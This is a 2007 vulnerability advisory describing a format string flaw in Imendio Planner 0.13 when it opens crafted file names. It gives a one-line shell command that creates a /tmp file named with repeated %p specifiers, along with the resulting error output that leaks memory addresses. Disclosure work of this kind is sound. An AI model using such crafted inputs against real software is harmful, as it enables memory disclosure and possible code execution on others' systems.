IMENDIO PLANNER REMOTE FILENAME FORMAT STRING VULNERABILITY

By : LoneEagle 
E-mail : king_purba@yahoo.co.uk
http://kandangjamur.net
Affected :
IMENDIO PLANNER 0.13
PROJECT MANAGEMENT FEDORA 4.
Impact : Aplication crashed and may be system acces
From : Remote
Severity : Moderately Critical

Description:
------------
Imendio planner was failed when opening file name format string.
Remote attacker can exploits this vulnerabilty by creating a malicious 
filename that contain format string specifier. Successfull attacking 
can be used for executing arbitrary code.

Demo :
----------
From terminal/console shell
$touch /tmp/`perl -e 'print "%p"x20'`

- Now, open your imendio planner from gnome start menu, then press F3 to open a file.
- Select file /tmp/%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p
- When opening the file, imendio gives an error pop up message. Yeah, format string error..

Error

Couldn't find a suitable file module for loading 
'/tmp/0x230x853c7780xb79822340xb78f9adc0xb78fb3200x8507c28(nil)
0x85213600x81248f80xbf9f02480x807fc640x81078000x8521360(nil)
0xb7929eec0x854b5c00x853c7780x854b5c00x844be200x8521360'

Analysis, PoC, and patch
------------------------------
I'm a  bit lazy to analyse the code or may be i'm a bit lamme too :)

Solution :
----------
Don't open file from untursted source.

(Last Edited 4/4/2007)